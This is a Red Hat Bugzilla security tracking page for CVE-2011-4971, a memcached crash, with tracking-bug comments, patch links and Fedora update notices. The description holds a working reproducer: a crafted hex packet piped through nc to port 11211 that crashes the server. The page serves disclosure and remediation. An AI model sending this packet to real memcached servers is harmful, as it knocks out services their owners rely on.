Bug 957964 - (CVE-2011-4971) CVE-2011-4971 memcached: specially crafted packet segmentation fault
CVE-2011-4971 memcached: specially crafted packet segmentation fault
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
low Severity low
: ---
: ---
Assigned To: Red Hat Product Security
impact=low,public=20110515,reported=2...
: Security
Depends On: 957967 957966 957969 957970 988739
Blocks: 957971
  Show dependency treegraph
 
Reported: 2013-04-29 22:07 EDT by Kurt Seifried
Modified: 2015-10-15 13:52 EDT (History)
12 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Novell 817781 None None None Never

  None (edit)
Description Kurt Seifried 2013-04-29 22:07:56 EDT
This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:

$ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it: 

$ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has 
changed significantly since then.

External References:

https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872
Comment 1 Kurt Seifried 2013-04-29 22:09:53 EDT
Created memcached tracking bugs for this issue

Affects: fedora-all [bug 957966]
Comment 2 Kurt Seifried 2013-04-29 22:10:27 EDT
Created memcached tracking bugs for this issue

Affects: epel-5 [bug 957967]
Comment 3 Kurt Seifried 2013-04-29 22:12:22 EDT
Created memcached tracking bugs for this issue

Affects: epel-6 [bug 957969]
Comment 6 Huzaifa S. Sidhpurwala 2013-06-18 05:31:39 EDT
Proposed upstream patch (with a test):

https://code.google.com/p/memcached/issues/detail?id=192#c19
Comment 8 Huzaifa S. Sidhpurwala 2013-06-18 05:36:01 EDT
Statement:

This issue affects the version of memcached as shipped with Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this issue as having low security impact, a future update may address this flaw.
Comment 11 Miroslav Lichvar 2013-12-12 08:43:40 EST
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks!

https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424
Comment 12 Fedora Update System 2014-02-02 21:42:28 EST
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 13 Fedora Update System 2014-02-02 21:49:02 EST
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.